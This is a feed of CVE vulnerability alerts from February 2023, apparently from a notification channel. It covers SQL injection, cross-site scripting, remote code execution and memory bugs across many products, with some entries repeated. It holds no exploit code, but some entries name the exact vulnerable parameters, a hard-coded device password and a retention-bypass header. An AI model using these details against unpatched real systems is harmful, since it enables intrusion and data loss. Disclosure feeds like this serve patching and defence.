| 2023-02-23 22:29:37 |
🚨 CVE-2022-32222A cryptographic vulnerability exists on Node.js on linux in versions of 18.x prior to 18.40.0 which allowed a default path for openssl.cnf that might be accessible under some circumstances to a non-admin user instead of /etc/ssl as was the case in versions prior to the upgrade to OpenSSL 3.🎖@cveNotify |
|
| 2023-02-23 17:29:43 |
🚨 CVE-2022-2097AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).🎖@cveNotify |
|
| 2023-02-23 17:29:41 |
🚨 CVE-2023-21568Microsoft SQL Server Integration Service (VS extension) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-02-23 17:29:40 |
🚨 CVE-2023-22942In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a cross-site request forgery in the Splunk Secure Gateway (SSG) app in the ‘kvstore_client’ REST endpoint lets a potential attacker update SSG [App Key Value Store (KV store)](https://docs.splunk.com/Documentation/Splunk/latest/Admin/AboutKVstore) collections using an HTTP GET request. SSG is a Splunk-built app that comes with Splunk Enterprise. The vulnerability affects instances with SSG and Splunk Web enabled.🎖@cveNotify |
|
| 2023-02-23 17:29:39 |
🚨 CVE-2023-21794Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2023-02-23 17:29:38 |
🚨 CVE-2022-3627LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemcpy in libtiff/tif_unix.c:346 when called from extractImageSection, tools/tiffcrop.c:6860, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191.🎖@cveNotify |
|
| 2023-02-23 17:29:37 |
🚨 CVE-2022-3636A vulnerability, which was classified as critical, was found in Linux Kernel. This affects the function __mtk_ppe_check_skb of the file drivers/net/ethernet/mediatek/mtk_ppe.c of the component Ethernet Handler. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211935.🎖@cveNotify |
|
| 2023-02-23 06:30:07 |
🚨 CVE-2022-45724Incorrect Access Control in Comfast router CF-WR6110N V2.3.1 allows a remote attacker on the same network to perform any HTTP request to an unauthenticated page to force the server to generate a SESSION_ID, and using this SESSION_ID an attacker can then perform authenticated requests.🎖@cveNotify |
|
| 2023-02-23 06:30:06 |
🚨 CVE-2023-0808A vulnerability was found in Deye/Revolt/Bosswerk Inverter MW3_15U_5406_1.47/MW3_15U_5406_1.471. It has been rated as problematic. This issue affects some unknown processing of the component Access Point Setting Handler. The manipulation with the input 12345678 leads to use of hard-coded password. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. Upgrading to version MW3_16U_5406_1.53 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-220769 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-23 06:30:04 |
🚨 CVE-2022-3891The WP FullCalendar WordPress plugin before 1.5 does not ensure that the post retrieved via an AJAX action is public and can be accessed by the user making the request, allowing unauthenticated attackers to get the content of arbitrary posts, including draft/private as well as password-protected ones.🎖@cveNotify |
|
| 2023-02-23 06:30:03 |
🚨 CVE-2022-40022Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.🎖@cveNotify |
|
| 2023-02-23 06:30:02 |
🚨 CVE-2022-45725Improper Input Validation in Comfast router CF-WR6110N V2.3.1 allows a remote attacker on the same network to execute arbitrary code on the target via an HTTP POST request🎖@cveNotify |
|
| 2023-02-23 06:30:00 |
🚨 CVE-2022-4445The FL3R FeelBox WordPress plugin through 8.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.🎖@cveNotify |
|
| 2023-02-23 06:29:59 |
🚨 CVE-2022-4448The GiveWP WordPress plugin before 2.24.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-23 06:29:58 |
🚨 CVE-2022-4458The amr shortcode any widget WordPress plugin through 4.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-23 06:29:57 |
🚨 CVE-2022-4580The Twenty20 Image Before-After WordPress plugin through 1.5.9 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-23 06:29:56 |
🚨 CVE-2022-4759The GigPress WordPress plugin before 2.3.28 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-23 06:29:52 |
🚨 CVE-2022-38935An issue was discovered in NiterForum version 2.5.0-beta in /src/main/java/cn/niter/forum/api/SsoApi.java and /src/main/java/cn/niter/forum/controller/AdminController.java, allows attackers to gain escalated privileges.🎖@cveNotify |
|
| 2023-02-23 06:29:51 |
🚨 CVE-2022-38868SQL Injection vulnerability in Ehoney version 2.0.0 in models/protocol.go and models/images.go, allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-02-23 06:29:50 |
🚨 CVE-2021-38239SQL Injection vulnerability in dataease before 1.2.0, allows attackers to gain sensitive information via the orders parameter to /api/sys_msg/list/1/10.🎖@cveNotify |
|
| 2023-02-23 06:29:49 |
🚨 CVE-2023-23850A missing permission check in Synopsys Jenkins Coverity Plugin 3.0.2 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-02-23 06:29:48 |
🚨 CVE-2020-21120SQL Injection vulnerability in file home\controls\cart.class.php in UQCMS 2.1.3, allows attackers execute arbitrary commands via the cookie_cart parameter to /index.php/cart/num.🎖@cveNotify |
|
| 2023-02-23 06:29:44 |
🚨 CVE-2021-33396Cross Site Request Forgery (CSRF) vulnerability in baijiacms 4.1.4, allows attackers to change the password or other information of an arbitrary account via index.php.🎖@cveNotify |
|
| 2023-02-23 06:29:43 |
🚨 CVE-2021-33925SQL Injection vulnerability in nitinparashar30 cms-corephp through commit bdabe52ef282846823bda102728a35506d0ec8f9 (May 19, 2021) allows unauthenticated attackers to gain escilated privledges via a crafted login.🎖@cveNotify |
|
| 2023-02-23 06:29:42 |
🚨 CVE-2022-38867SQL Injection vulnerability in rttys versions 4.0.0, 4.0.1, and 4.0.2 in api.go, allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-02-23 06:29:41 |
🚨 CVE-2022-45543Cross site scripting (XSS) vulnerability in DiscuzX 3.4 allows attackers to execute arbitrary code via the datetline, title, tpp, or username parameters via the audit search.🎖@cveNotify |
|
| 2023-02-23 06:29:40 |
🚨 CVE-2022-45546Information Disclosure in Authentication Component of ScreenCheck BadgeMaker 2.6.2.0 application allows internal attacker to obtain credentials for authentication via network sniffing.🎖@cveNotify |
|
| 2023-02-23 00:29:37 |
🚨 CVE-2021-33367Buffer Overflow vulnerability in Freeimage v3.18.0 allows attacker to cause a denial of service via a crafted JXR file.🎖@cveNotify |
|
| 2023-02-23 00:29:36 |
🚨 CVE-2022-29273pfSense CE through 2.6.0 and pfSense Plus before 22.05 allow XSS in the WebGUI via URL Table Alias URL parameters.🎖@cveNotify |
|
| 2023-02-22 16:29:54 |
🚨 CVE-2023-0946A vulnerability has been found in SourceCodester Best POS Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file billing/index.php?id=9. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The identifier VDB-221593 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-22 16:29:53 |
🚨 CVE-2023-25158GeoTools is an open source Java library that provides tools for geospatial data. GeoTools includes support for OGC Filter expression language parsing, encoding and execution against a range of datastore. SQL Injection Vulnerabilities have been found when executing OGC Filters with JDBCDataStore implementations. Users are advised to upgrade to either version 27.4 or to 28.2 to resolve this issue. Users unable to upgrade may disable `encode functions` for PostGIS DataStores or enable `prepared statements` for JDBCDataStores as a partial mitigation.🎖@cveNotify |
|
| 2023-02-22 16:29:51 |
🚨 CVE-2023-25657Nautobot is a Network Source of Truth and Network Automation Platform. All users of Nautobot versions earlier than 1.5.7 are impacted by a remote code execution vulnerability. Nautobot did not properly sandbox Jinja2 template rendering. In Nautobot 1.5.7 has enabled sandboxed environments for the Jinja2 template engine used internally for template rendering for the following objects: `extras.ComputedField`, `extras.CustomLink`, `extras.ExportTemplate`, `extras.Secret`, `extras.Webhook`. While no active exploits of this vulnerability are known this change has been made as a preventative measure to protect against any potential remote code execution attacks utilizing maliciously crafted template code. This change forces the Jinja2 template engine to use a `SandboxedEnvironment` on all new installations of Nautobot. This addresses any potential unsafe code execution everywhere the helper function `nautobot.utilities.utils.render_jinja2` is called. Additionally, the documentation that had previously suggesting the direct use of `jinja2.Template` has been revised to suggest `render_jinja2`. Users are advised to upgrade to Nautobot 1.5.7 or newer. For users that are unable to upgrade to the latest release of Nautobot, you may add the following setting to your `nautobot_config.py` to apply the sandbox environment enforcement: `TEMPLATES[1]["OPTIONS"]["environment"] = "jinja2.sandbox.SandboxedEnvironment"` After applying this change, you must restart all Nautobot services, including any Celery worker processes. **Note:** *Nautobot specifies two template engines by default, the first being “django” for the Django built-in template engine, and the second being “jinja” for the Jinja2 template engine. This recommended setting will update the second item in the list of template engines, which is the Jinja2 engine.* For users that are unable to immediately update their configuration such as if a Nautobot service restart is too disruptive to operations, access to provide custom Jinja2 template values may be mitigated using permissions to restrict “change” (write) actions to the affected object types listed in the first section. **Note:** *This solution is intended to be stopgap until you can successfully update your `nautobot_config.py` or upgrade your Nautobot instance to apply the sandboxed environment enforcement.*🎖@cveNotify |
|
| 2023-02-22 16:29:50 |
🚨 CVE-2023-25810Uptime Kuma is a self-hosted monitoring tool. In versions prior to 1.20.0 the Uptime Kuma status page allows a persistent XSS attack. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-02-22 16:29:48 |
🚨 CVE-2023-25811Uptime Kuma is a self-hosted monitoring tool. In versions prior to 1.20.0 the Uptime Kuma `name` parameter allows a persistent XSS attack. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-02-22 16:29:46 |
🚨 CVE-2023-25812Minio is a Multi-Cloud Object Storage framework. Affected versions do not correctly honor a `Deny` policy on ByPassGoverance. Ideally, minio should return "Access Denied" to all users attempting to DELETE a versionId with the special header `X-Amz-Bypass-Governance-Retention: true`. However, this was not honored instead the request will be honored and an object under governance would be incorrectly deleted. All users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-02-22 16:29:44 |
🚨 CVE-2023-24320An access control issue in Axcora POS #0~gitf77ec09 allows unauthenticated attackers to execute arbitrary commands via unspecified vectors.🎖@cveNotify |
|
| 2023-02-22 16:29:43 |
🚨 CVE-2023-25157GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.🎖@cveNotify |
|
| 2023-02-22 16:29:41 |
🚨 CVE-2022-48282Under very specific circumstances (see Required configuration section below), a privileged user is able to cause arbitrary code to be executed which may cause further disruption to services. This is specific to applications written in C#. This affects all MongoDB .NET/C# Driver versions prior to and including v2.18.0🎖@cveNotify |
|
| 2023-02-22 16:29:40 |
🚨 CVE-2023-0942The Japanized For WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘tab’ parameter in versions up to, and including, 2.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-02-22 16:29:38 |
🚨 CVE-2023-0943A vulnerability, which was classified as problematic, has been found in SourceCodester Best POS Management System 1.0. This issue affects some unknown processing of the file index.php?page=site_settings of the component Image Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-221591.🎖@cveNotify |
|
| 2023-02-22 12:29:39 |
🚨 CVE-2023-25136OpenSSH server (sshd) 9.1 introduced a double-free vulnerability during options.kex_algorithms handling. This is fixed in OpenSSH 9.2. The double free can be leveraged, by an unauthenticated remote attacker in the default configuration, to jump to any location in the sshd address space. One third-party report states "remote code execution is theoretically possible."🎖@cveNotify |
|
| 2023-02-22 12:29:38 |
🚨 CVE-2023-26314The mono package before 6.8.0.105+dfsg-3.3 for Debian allows arbitrary code execution because the application/x-ms-dos-executable MIME type is associated with an un-sandboxed Mono CLR interpreter.🎖@cveNotify |
|
| 2023-02-22 07:30:21 |
🚨 CVE-2023-0800LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3502, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-22 07:30:19 |
🚨 CVE-2023-0801LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in libtiff/tif_unix.c:368, invoked by tools/tiffcrop.c:2903 and tools/tiffcrop.c:6778, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-22 07:30:17 |
🚨 CVE-2023-0802LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3724, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-22 07:30:15 |
🚨 CVE-2023-0803LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3516, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-22 07:30:12 |
🚨 CVE-2023-0804LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3609, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.🎖@cveNotify |
|
| 2023-02-22 07:30:10 |
🚨 CVE-2023-24084ChiKoi v1.0 was discovered to contain a SQL injection vulnerability via the load_file function.🎖@cveNotify |
|
| 2023-02-22 07:30:08 |
🚨 CVE-2023-24086SLIMS v9.5.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /customs/loan_by_class.php?reportView.🎖@cveNotify |
|
| 2023-02-22 07:30:06 |
🚨 CVE-2022-45091Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Group Arge Energy and Control Systems Smartpower Web allows Cross-Site Scripting (XSS).This issue affects Smartpower Web: before 23.01.01.🎖@cveNotify |
|
| 2023-02-22 07:30:04 |
🚨 CVE-2022-45090Improper Input Validation vulnerability in Group Arge Energy and Control Systems Smartpower Web allows SQL Injection.This issue affects Smartpower Web: before 23.01.01.🎖@cveNotify |
|
| 2023-02-22 07:30:01 |
🚨 CVE-2022-45089Improper Input Validation vulnerability in Group Arge Energy and Control Systems Smartpower Web allows SQL Injection.This issue affects Smartpower Web: before 23.01.01.🎖@cveNotify |
|
| 2023-02-22 07:29:59 |
🚨 CVE-2022-45088Improper Input Validation vulnerability in Group Arge Energy and Control Systems Smartpower Web allows PHP Local File Inclusion.This issue affects Smartpower Web: before 23.01.01.🎖@cveNotify |
|
| 2023-02-22 07:29:57 |
🚨 CVE-2022-45087Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Group Arge Energy and Control Systems Smartpower Web allows Cross-Site Scripting (XSS).This issue affects Smartpower Web: before 23.01.01.🎖@cveNotify |
|
| 2023-02-22 07:29:55 |
🚨 CVE-2022-45086Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Group Arge Energy and Control Systems Smartpower Web allows Cross-Site Scripting (XSS).This issue affects Smartpower Web: before 23.01.01.🎖@cveNotify |
|
| 2023-02-22 07:29:53 |
🚨 CVE-2022-45085Server-Side Request Forgery (SSRF) vulnerability in Group Arge Energy and Control Systems Smartpower Web allows : Server Side Request Forgery.This issue affects Smartpower Web: before 23.01.01.🎖@cveNotify |
|
| 2023-02-22 07:29:51 |
🚨 CVE-2022-44447In wlan driver, there is a possible null pointer dereference issue due to a missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-02-22 07:29:49 |
🚨 CVE-2022-44448In wlan driver, there is a possible missing params check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-02-22 07:29:47 |
🚨 CVE-2021-4325A vulnerability, which was classified as problematic, has been found in NHN TOAST UI Chart 4.1.4. This issue affects some unknown processing of the component Legend Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 4.2.0 is able to address this issue. The name of the patch is 1a3f455d17df379e11b501bb5ba1dd1bcc41d63e. It is recommended to upgrade the affected component. The identifier VDB-221501 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-22 07:29:45 |
🚨 CVE-2022-38779An open redirect issue was discovered in Kibana that could lead to a user being redirected to an arbitrary website if they use a maliciously crafted Kibana URL.🎖@cveNotify |
|
| 2023-02-22 07:29:43 |
🚨 CVE-2023-20855VMware vRealize Orchestrator contains an XML External Entity (XXE) vulnerability. A malicious actor, with non-administrative access to vRealize Orchestrator, may be able to use specially crafted input to bypass XML parsing restrictions leading to access to sensitive information or possible escalation of privileges.🎖@cveNotify |
|
| 2023-02-22 07:29:41 |
🚨 CVE-2023-20858VMware Carbon Black App Control 8.7.x prior to 8.7.8, 8.8.x prior to 8.8.6, and 8.9.x.prior to 8.9.4 contain an injection vulnerability. A malicious actor with privileged access to the App Control administration console may be able to use specially crafted input allowing access to the underlying server operating system.🎖@cveNotify |
|
| 2023-02-21 23:29:45 |
🚨 CVE-2023-0946A vulnerability has been found in SourceCodester Best POS Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file billing/index.php?id=9. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The identifier VDB-221593 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-21 23:29:44 |
🚨 CVE-2023-25158GeoTools is an open source Java library that provides tools for geospatial data. GeoTools includes support for OGC Filter expression language parsing, encoding and execution against a range of datastore. SQL Injection Vulnerabilities have been found when executing OGC Filters with JDBCDataStore implementations. Users are advised to upgrade to either version 27.4 or to 28.2 to resolve this issue. Users unable to upgrade may disable `encode functions` for PostGIS DataStores or enable `prepared statements` for JDBCDataStores as a partial mitigation.🎖@cveNotify |
|
| 2023-02-21 23:29:43 |
🚨 CVE-2023-25657Nautobot is a Network Source of Truth and Network Automation Platform. All users of Nautobot versions earlier than 1.5.7 are impacted by a remote code execution vulnerability. Nautobot did not properly sandbox Jinja2 template rendering. In Nautobot 1.5.7 has enabled sandboxed environments for the Jinja2 template engine used internally for template rendering for the following objects: `extras.ComputedField`, `extras.CustomLink`, `extras.ExportTemplate`, `extras.Secret`, `extras.Webhook`. While no active exploits of this vulnerability are known this change has been made as a preventative measure to protect against any potential remote code execution attacks utilizing maliciously crafted template code. This change forces the Jinja2 template engine to use a `SandboxedEnvironment` on all new installations of Nautobot. This addresses any potential unsafe code execution everywhere the helper function `nautobot.utilities.utils.render_jinja2` is called. Additionally, the documentation that had previously suggesting the direct use of `jinja2.Template` has been revised to suggest `render_jinja2`. Users are advised to upgrade to Nautobot 1.5.7 or newer. For users that are unable to upgrade to the latest release of Nautobot, you may add the following setting to your `nautobot_config.py` to apply the sandbox environment enforcement: `TEMPLATES[1]["OPTIONS"]["environment"] = "jinja2.sandbox.SandboxedEnvironment"` After applying this change, you must restart all Nautobot services, including any Celery worker processes. **Note:** *Nautobot specifies two template engines by default, the first being “django” for the Django built-in template engine, and the second being “jinja” for the Jinja2 template engine. This recommended setting will update the second item in the list of template engines, which is the Jinja2 engine.* For users that are unable to immediately update their configuration such as if a Nautobot service restart is too disruptive to operations, access to provide custom Jinja2 template values may be mitigated using permissions to restrict “change” (write) actions to the affected object types listed in the first section. **Note:** *This solution is intended to be stopgap until you can successfully update your `nautobot_config.py` or upgrade your Nautobot instance to apply the sandboxed environment enforcement.*🎖@cveNotify |
|
| 2023-02-21 23:29:42 |
🚨 CVE-2023-25810Uptime Kuma is a self-hosted monitoring tool. In versions prior to 1.20.0 the Uptime Kuma status page allows a persistent XSS attack. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-02-21 23:29:39 |
🚨 CVE-2023-25811Uptime Kuma is a self-hosted monitoring tool. In versions prior to 1.20.0 the Uptime Kuma `name` parameter allows a persistent XSS attack. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-02-21 23:29:38 |
🚨 CVE-2022-43779A potential Time-of-Check to Time-of-Use (TOCTOU) vulnerability has been identified in certain HP PC products using AMI UEFI Firmware (system BIOS) which might allow arbitrary code execution, denial of service, and information disclosure. AMI has released updates to mitigate the potential vulnerability.🎖@cveNotify |
|
| 2023-02-21 23:29:37 |
🚨 CVE-2023-0783A vulnerability was found in EcShop 4.1.5. It has been classified as critical. This affects an unknown part of the file /ecshop/admin/template.php of the component PHP File Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220641 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-21 23:29:36 |
🚨 CVE-2022-41731IBM Watson Knowledge Catalog on Cloud Pak for Data 4.5.0 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 237402.🎖@cveNotify |
|
| 2023-02-21 21:29:43 |
🚨 CVE-2023-0286There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.🎖@cveNotify |
|
| 2023-02-21 21:29:42 |
🚨 CVE-2023-0151The uTubeVideo Gallery WordPress plugin before 2.0.8 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 21:29:41 |
🚨 CVE-2022-42444IBM App Connect Enterprise 11.0.0.8 through 11.0.0.19 and 12.0.1.0 through 12.0.5.0 is vulnerable to a buffer overflow. A remote privileged user could overflow a buffer and cause the application to crash. IBM X-Force ID: 238538.🎖@cveNotify |
|
| 2023-02-21 21:29:40 |
🚨 CVE-2023-25614SAP NetWeaver AS ABAP (BSP Framework) application - versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allow an unauthenticated attacker to inject the code that can be executed by the application over the network. On successful exploitation it can gain access to the sensitive information which leads to a limited impact on the confidentiality and the integrity of the application.🎖@cveNotify |
|
| 2023-02-21 21:29:39 |
🚨 CVE-2022-42436IBM MQ 8.0.0, 9.0.0, 9.1.0, 9.2.0, 9.3.0 Managed File Transfer could allow a local user to obtain sensitive information from diagnostic files. IBM X-Force ID: 238206.🎖@cveNotify |
|
| 2023-02-21 21:29:38 |
🚨 CVE-2023-24529Due to lack of proper input validation, BSP application (CRM_BSP_FRAME) - versions 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75D, 75E, 75F, 75G, 75H, allow malicious inputs from untrusted sources, which can be leveraged by an attacker to execute a Reflected Cross-Site Scripting (XSS) attack. As a result, an attacker may be able to hijack a user session, read and modify some sensitive information.🎖@cveNotify |
|
| 2023-02-21 21:29:37 |
🚨 CVE-2023-24530SAP BusinessObjects Business Intelligence Platform (CMC) - versions 420, 430, allows an authenticated admin user to upload malicious code that can be executed by the application over the network. On successful exploitation, attacker can perform operations that may completely compromise the application causing high impact on confidentiality, integrity and availability of the application.🎖@cveNotify |
|
| 2023-02-21 20:29:42 |
🚨 CVE-2023-21437Improper access control vulnerability in Phone application prior to SMR Feb-2023 Release 1 allows local attackers to access sensitive information via implicit broadcast.🎖@cveNotify |
|
| 2023-02-21 20:29:41 |
🚨 CVE-2023-23163Art Gallery Management System Project v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter.🎖@cveNotify |
|
| 2023-02-21 20:29:39 |
🚨 CVE-2022-47368In wlan driver, there is a possible missing params check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-02-21 20:29:38 |
🚨 CVE-2022-47367In bluetooth driver, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-02-21 18:29:57 |
🚨 CVE-2023-22984A Vulnerability was discovered in Axis 207W network camera. There is a reflected XSS vulnerability in the web administration portal, which allows an attacker to execute arbitrary JavaScript via URL.🎖@cveNotify |
|
| 2023-02-21 18:29:56 |
🚨 CVE-2022-4422This issue affects: Bulutses Bilgi Teknolojileri LTD. ?T?. BULUTDESK CALLCENTER versions prior to 3.0.🎖@cveNotify |
|
| 2023-02-21 18:29:55 |
🚨 CVE-2023-21421Improper Handling of Insufficient Permissions or Privileges vulnerability in KnoxCustomManagerService prior to SMR Jan-2023 Release 1 allows attacker to access device SIM PIN.🎖@cveNotify |
|
| 2023-02-21 18:29:51 |
🚨 CVE-2022-38777An issue was discovered in the rollback feature of Elastic Endpoint Security for Windows, which could allow unprivileged users to elevate their privileges to those of the LocalSystem account.🎖@cveNotify |
|
| 2023-02-21 18:29:50 |
🚨 CVE-2022-34451PowerPath Management Appliance with versions 3.3 & 3.2*, 3.1 & 3.0* contains a Stored Cross-site Scripting Vulnerability. An authenticated admin user could potentially exploit this vulnerability, to hijack user sessions or trick a victim application user into unknowingly send arbitrary requests to the server.🎖@cveNotify |
|
| 2023-02-21 18:29:49 |
🚨 CVE-2022-34449PowerPath Management Appliance with versions 3.3 & 3.2* contains a Hardcoded Cryptographic Keys vulnerability. Authenticated admin users can exploit the issue that leads to view and modifying sensitive information stored in the application.🎖@cveNotify |
|
| 2023-02-21 18:29:48 |
🚨 CVE-2022-34450PowerPath Management Appliance with version 3.3 contains Privilege Escalation vulnerability. An authenticated admin user could potentially exploit this issue and gain unrestricted control/code execution on the system as root.🎖@cveNotify |
|
| 2023-02-21 18:29:45 |
🚨 CVE-2023-22797An open redirect vulnerability is fixed in Rails 7.0.4.1 with the new protection against open redirects from calling redirect_to with untrusted user input. In prior versions the developer was fully responsible for only providing trusted input. However the check introduced could allow an attacker to bypass with a carefully crafted URL resulting in an open redirect vulnerability.🎖@cveNotify |
|
| 2023-02-21 18:29:44 |
🚨 CVE-2023-21442Improper access control vulnerability in Runestone application prior to version 2.9.09.003 in Android R(11) and 3.2.01.007 in Android S(12) allows local attackers to get device location information.🎖@cveNotify |
|
| 2023-02-21 18:29:43 |
🚨 CVE-2022-34447PowerPath Management Appliance with versions 3.3 & 3.2*, 3.1 & 3.0* contains OS Command Injection vulnerability. An authenticated remote attacker with administrative privileges could potentially exploit the issue and execute commands on the system as the root user.🎖@cveNotify |
|
| 2023-02-21 18:29:42 |
🚨 CVE-2022-34448PowerPath Management Appliance with versions 3.3 & 3.2*, 3.1 & 3.0* contains a Cross-site Request Forgery vulnerability. An unauthenticated non-privileged user could potentially exploit the issue and perform any privileged state-changing actions.🎖@cveNotify |
|
| 2023-02-21 18:29:39 |
🚨 CVE-2023-21432Improper access control vulnerabilities in Smart Things prior to 1.7.93 allows to attacker to invite others without authorization of the owner.🎖@cveNotify |
|
| 2023-02-21 18:29:38 |
🚨 CVE-2015-10084A vulnerability was found in irontec klear-library chloe and classified as critical. Affected by this issue is the function _prepareWhere of the file Controller/Rest/BaseController.php. The manipulation leads to sql injection. Upgrading to version marla is able to address this issue. The name of the patch is b25262de52fdaffde2a4434fc2a84408b304fbc5. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-221504.🎖@cveNotify |
|
| 2023-02-21 18:29:37 |
🚨 CVE-2021-32855Vditor is a browser-side Markdown editor. Versions prior to 3.8.7 are vulnerable to copy-paste cross-site scripting (XSS). For this particular type of XSS, the victim needs to be fooled into copying a malicious payload into the text editor. Version 3.8.7 contains a patch for this issue.🎖@cveNotify |
|
| 2023-02-21 16:30:11 |
🚨 CVE-2023-0378The Greenshift WordPress plugin before 5.0 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 16:30:06 |
